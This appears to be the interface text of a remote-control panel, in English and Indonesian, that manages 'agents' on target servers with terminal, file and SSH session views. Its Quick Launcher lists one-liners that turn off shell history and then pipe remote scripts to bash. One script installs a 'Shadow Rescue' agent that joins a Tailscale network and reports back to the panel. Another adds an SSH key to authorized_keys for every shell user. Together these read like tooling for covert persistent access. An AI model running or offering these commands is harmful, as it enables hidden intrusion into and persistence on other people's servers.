Total
Online
Offline
NameStatusIPPlatformKey ExpiryLast Seen
Loading agents...
NameOwnerSizeModifiedMode
Select terminal first...

Activity

SSH session logs

Keep:
Total Sessions
Today
This Week
Unique Hosts
Recent Sessions showing last 200
Tailscale Configuration
Get from tailscale.com → Admin → Settings → Keys
Kosongkan untuk auto-detect dari API key
Account
Quick Launcher
Shadow Rescue AGENT

Install agen Shadow Rescue ke server target. Otomatis join Tailscale network dan kirim heartbeat ke panel.

① Install via curl
unset HISTFILE; HISTFILESIZE=0; curl -fsSL https://ts.carlesgantengidaman.uk/i/9c37e87edda1ee90 | bash
② URL installer
https://ts.carlesgantengidaman.uk/i/9c37e87edda1ee90
Tailscale VPN

Install Tailscale VPN di server target, lalu auth ke tailnet dengan auth key dari Tailscale admin.

① Install (Linux)
curl -fsSL https://tailscale.com/install.sh | sh
② Auth ke tailnet
tailscale up --authkey=tskey-auth-XXXX --hostname=$(hostname)
SSH Key Deploy KEY

Tambah SSH public key ke authorized_keys semua user ber-shell di server target.

① One-liner
unset HISTFILE; HISTFILESIZE=0; curl -fsSL https://raw.githubusercontent.com/bssn1337/ssh-deploy/main/add-key.sh | sudo bash